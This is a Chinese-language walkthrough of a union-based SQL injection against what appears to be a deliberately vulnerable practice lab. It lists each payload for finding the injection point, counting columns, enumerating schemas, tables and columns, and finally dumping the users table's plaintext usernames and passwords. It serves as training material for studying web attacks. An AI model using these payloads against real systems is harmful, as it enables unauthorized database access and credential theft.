判断注入点

使用?id=1’) and 1=2 —+与?id=1’) and 1=1 —+可以判断出存在注入点

判断字段数量

使用?id=1’) order by 4 —+ 与?id=1’) order by 3可以判断出字段数量是3 —+

判断回显数据的点

使用?id=-1’) union select 1,2,3 —+可以判断出2,3两个位置可以回显数据

爆破数据库名称

使用?id=-1’) union select 1,group_concat(schema_name),3 from information_schema.schemata —+爆出数据库的名称为:
information_schema,challenges,mysql,performance_schema,security

爆破表的名称

使用?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’ —+爆破出security数据库中的表的名称为:emails,referers,uagents,users

爆破字段名

通过使用 ?id=-1’) union select 1,group_concat(column_name),3 from information_schema.columns where table_name = ‘users’ —+爆破出users表中的字段的名称为:id,username,password

爆破数据

现在已经知道了数据库、表、字段的名称,接下来就是愉快的爆数据的环节了。
通过使用?id=-1’) union select 1,group_concat(username),group_concat(password) from security.users —+得到security数据库中users表中的数据为:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4